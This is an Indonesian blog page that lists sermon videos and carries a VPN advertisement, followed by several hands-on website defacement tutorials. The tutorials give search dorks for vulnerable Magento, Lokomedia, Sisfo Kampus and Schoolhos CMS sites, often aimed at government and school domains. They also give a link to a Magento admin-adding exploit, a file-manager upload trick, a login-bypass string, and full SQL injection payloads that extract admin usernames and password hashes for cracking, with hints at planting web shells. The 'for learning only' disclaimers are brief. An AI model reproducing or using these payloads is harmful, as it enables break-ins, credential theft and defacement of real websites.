ceramah pengajian dakwah

Kisah umar  yang membuat ust adi hidayat menangis
minta berjodoh dengannya , jangan berhenti berharap kepada allah ust hanan attaki
agar kita terlepas dari kemiskinan ust adi hidayat
amalan yang mampu membuat jasa utuh didalam kubur ust adi hidayat
bagaimana hukum sedekah kepada keluarga sendiri ust adi hidayat
bagaimana menghadapi istri yang keras kepala ust adi hidayat
bakti anak kepada orang tua ust adi hidayat
bara api akhir yaman ust adi hidayat
cara agar tidak mengeluh ust adi hidayat
cara menguatkan ingatan ust adi hidayat
cara pasti sukses dunia akhirat ust adi hidayat
hijrah menjadi lebih baik ust adi hidayat

Read More

MELINDUNGI PRIVASI SAAT ONLINE / MENYEMBUNIKAN IP TANPA BATAS (CYBERGHOST)

Hai Sahabat IT ku , postingan kali ini membahas IP HIDE TOOLS . biasanya saya menggunakan Hide My ip , tapi kali ini saya akan membahas tools CYBERGHOST yang bisa anda gunakan untuk melindungi privasi saat Online .

• CYBERGOSHT

 CyberGhost VPN melindungi kamu dari penyadapan data oleh pemilik situs, pengiklan, dan snoopers online lainnya. Dengan menghubungkan ke CyberGhost VPN, kamu memasuki dunia anonimitas lengkap: IP kamu akan berubah dan koneksi internet kamu dienkripsi hanya dengan satu kali klik.

Dengan CyberGhost VPN, kamu dapat menyembunyikan alamat IP kamu dan mendapatkan keuntungan dari military-grade encryption. CyberGhost  menggunakan enkripsi AES 256-bit, yang terkuat ada. Jadi gunakan CyberGhost VPN ketika melakukan aktifitas perbankan online.

CyberGhost akan mengubah lokasi virtual kamu (IP) ke negara pilihan kamu setiap kali kamu terhubung sehingga kamu akan langsung dapat mengakses konten online seperti video dan musik yang disensor atau diblokir pemerintah.

Sekarang kamu dapat dengan aman mengakses website seperti Netflix, Fox, ABC, YouTube, Flickr, Spotify, Pandora, Facebook, Twitter, dan banyak lainnya.

Dengan CyberGhost, kamu tidak akan lagi harus berurusan dengan iklan yang mengganggul.
CyberGhost juga akan memblok semua popup dan gambar yang menutupi layar perangkat kamu sehingga hampir tak terlihat.

Siapa pun yang mencoba untuk melacak perilaku online kamu dengan cookie atau jenis konten lainnya yang bertujuan untuk mengawasi semua yang kamu lakukan di Internet tidak memiliki kesempatan pada saat itu jika kamu menggunakan CyberGhost. CyberGhost memblokir sesuatu yang bahkan berpikir tentang pemantauan kamu secara online.

CyberGhost VPN sangat mudah digunakan dan tidak menyimpan log, sehingga sangat sempurna untuk berselancar, berbagi file, menghubungkan perangkat kamu ke Wi-Fi hotspot dan mengelola rekening perbankan online kamu dengan aman.


Link Download 

Read More

CARA DEFACE WEBSITE TEKNIK MAGENTO ADD ADMIN

Hello World, Please Say Hello Haters :*

kali ini saya akan Share salah satu Bug/Celah pada salah satu CMS eCommerce, yaitu CMS Magento, menggunakan Teknik Add Administrator.

biasanya para carder dan sesepuh Dispenser yang biasa maen Log $_$ , bakal suka nih ama yang berbau cms eshop komersial >.<

 

Bahan :

* Dork

* Exploit magento https://www.thuillierprod.fr/local-magento.php 

* berusaha dan ikhtiyar

Lanjut intip tutornya ;*

1. Dork Magento

inurl:/catalogsearch/term/popular/ "united"
inurl:/catalogsearch/term/popular/ "store"

inurl:/catalogsearch/term/popular/ "mobile"
inurl:/catalogsearch/term/popular/ "shop"
intext:2016 inurl:/dailydeal/
inurl:/catalogsearch/term/popular/ "united"
inurl:/catalogsearch/term/popular/ "shop"
inurl:/catalogsearch/term/popular/ "store"
inurl:/catalogsearch/term/popular/ "mobile"
inurl:/catalogsearch/term/popular/ "2016"

(kembangkan lagi use your kaki eh brain, biar dpt yg vuln n verawan)

2. Dorking di Search Engine
3. buka exploit dan masukin target webmu
 bisa sampai 20 web

 

4. jika sukses lalu login ke admin nya, tinggal nambahin admin di belakang site
http://site/admin 

Kita coba langsung ke page admin Loginnya: target.coli/admin


Dan bismillah

NB: POSTINGAN INI HANYALAH SEBATAS PENGETAHUAN TIDAK BOLEH DISALAH GUNAKAN , BILA TERJADI SESUATU WILOTA.BLOGSPOT.COM/ADMIN TIDAK BERTANGGUNG JAWAB

Read More

Deface teknik SQLi CMS Lokomedia

Dork :
 inurl:/filemanager/ intext:"dialog.php"
 inurl:/js/filemanager/ intext:"dialog.php"
 inurl:/assets/filemanager/ intext:"dialog.php"
Kembangkan Lagi Dorknya   ;)

Exploit ;   localhost /[path]/filemanager/dialog.php

Script Deface Kalian. Ex.HTML

Lanjut Ke Tutorialnya   ;)

1. Masukan Dork Di Search Engine.

2. Pilih Targetnya

3. Lalu Masukan Exploitnya .
 Contoh ; localhost /filemanager/dialog.php
                localhost /[path]/filemanager/dialog.php

4. Lalu Upload File Deface Kalian Di Kotak Merah Ini (Lihat Gambar)

Lalu Klik "Drop Files To Upload" Untuk Mengambil File Deface Kalian.

5. Kalo Sudah Nanti Akan Muncul Berhasil Seperti Ini.

6. File Akses ? Klik Kanan Pada File => Pilih URL File .

7. Dan Lihat Hasilnya   :v
 Selesai   ;) Sumber ? Garuda Security Hacker .

Terima Kasih.

Read More

Deface Teknik Bypass Admin Login Injection

karna yg paling banyak di minati orang adalah deface website.. sudah jelas dengan judul nya "Deface Teknik Bypass Admin Login Injection" Langsung simak aja tutorialnya.

Bahan Bahan :
1. Koneksi Internet
2. Script Deface
3. Dork :
   inurl:/?mnux=login
   "Powered by Sisfo Kampus"

Langsung Aja Yahh :v
1. Masukan Dork Di Google , Yahoo Atau Bing!
2. Pilih Salah Satu Website Yang Mau Di Perawanin :v
3. Masukan Exploitnya.
Contoh : localhost / ?mnux=login

4. Lalu Pilih "Superuser"

5. Setelah Itu Akan Menemukan Panel Login.

 Masukan Username & Password : '=''or'

6. Setelah Itu , Pilih " Master -> Mahasiswa "

7. Nanti Akan Muncul Gambar Seperti Ini.

 Pilih Edit !

8. Klik "Ganti Photo"

9. Upload Script Deface Yang Ektensi .HTML

10. Kalo Sudah , Klik Photonya  >  Klik Kanan  >  Copy Image Address !

 Dan Buka TAB-BAR Baru :* Lalu Paste   :*

Read More

Deface teknik SQLi CMS Lokomedia

karna yg paling banyak di minati orang adalah deface website.. sudah jelas dengan judul nya "Deface teknik SQLi CMS Lokomedia" Langsung simak aja tutorialnya.

Bahan :

1. Dork : 

inurl:statis-1-profil.html

inurl:statis-2-profil.html

inurl:statis-3-strukturorganisasi.html

Note : tambahkan site:org site:net :site:go.id site:ac.id site:id

(Use Your Brain)

2. Exploit SQLi (SQL Injection) :

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Bingung cara ngexploit nya ?? sini di kasih tau :v

contoh : 

http://sitepemerintah.co.li/statis-2-profil.html 

kamu tambahin exploit nya sesudah angka jadi kaya gini :

http://sitepemerintah.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

ngerti kan ??

3. MD5 Decrypter :

MD5 Decrypt nya pake otak kamu sendiri aja :v tenang ada tool online nya kok
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/

Tutorial :

1. Dorking pake dork di atas,

2. Cari targetnya, setelah ketemu masukin inject nya ! seperti contoh di atas

3. Jika Vuln akan ada kode MD5 di tab bar (liat gambar aja biar jelas)

4. Lalu kamu pencet CTRL+U lalu kamu copykan kode MD5 tersebut, lalu decrypt di MD5 Decrypter

5. Tinggal cari dimana tempat login admin nya :) biasanya ada di :
http://target-suka.co.li/admin/
http://target-suka.co.li/adminweb/
http://target-suka.co.li/admininistrator/

6. Untuk Nanem shell ?? User Your Brain Kids !! (Jgn manja)

7. Akses shell ?? setelah nanem shell klik kanan gambar yang ancur lalu klik view image


Note : tapi saya sarankan sebelum melakukan inject terhadap target, lebih baik cari dlu login adminnya :)
postingan ini hanyalah pelajaran semata , jika terjadi apa - apa admin tidak bertanggung jawab

Karena CMS Lokomedia ini dipakai oleh web indonesia, mohon bantuan untuk tidak merusak !!
bikin web itu susah !!!

Read More

DEFACE CMS SCHOOL HOST SQLi

hallo para master , sebelumnya saya minta maaf kalo Post ini penuh kekurangan
CMS school host yang banyak digunakan website sch.id atau website sekolah ini memiliki bug yang cukup beresiko, simak tutorial berikut

Bahan

1. Dork

#  inurl:"/?p=info" site:id

#  inurl:"/?p=detberita"

#  inurl:"/?p=guru" site:id 

# inurl:/?p=bukutamu 

# intext:Schoolhos Free Open Source CMS

Kembangkan , jangan manja , gunakan otak kalian !

2. Sql Exploit

' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

3. MD5 hash

www.md5online.org/

https://hashkiller.co.uk/

md5cracker.org/

www.md5hashgenerator.com/ 

Langkah Tutorial

1. Dorking di GOOGLE

cari terus , jangan malas

2. pilih target

3. masukan exploit

ex: www.target.domain/?p=detberita&id=5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

4.kalo vuln maka akan seperti ini




disamping user ada angka angka Contoh admin30017008 hiraukan saja

5. Copy MD5 hash tadi , buka MD5 decrypter, masukan di situ , submit

6. login ke page admin nya : http://terget.domain/adminpanel

masukan user dan password 

selesai ..

mau tanam shell  ? tunggu post berikutnya

Catatan : Perlu di ingat cms ini digunakan banyak sekolah , saya mohon jangan mendeface situs situs sekolah , apalagi sampai tembas index, terus dimasukin archive

pengen tenar ? pengen di puji ? lo cari ilmu apa cari  muka ! kalo pengen tenar buat tool jangan merusak

gsk usah show off defacean , admin tidak bertanggung jawab jika ada masalah , ini hanya sekedar penmbelajaran untuk para newbie

Read More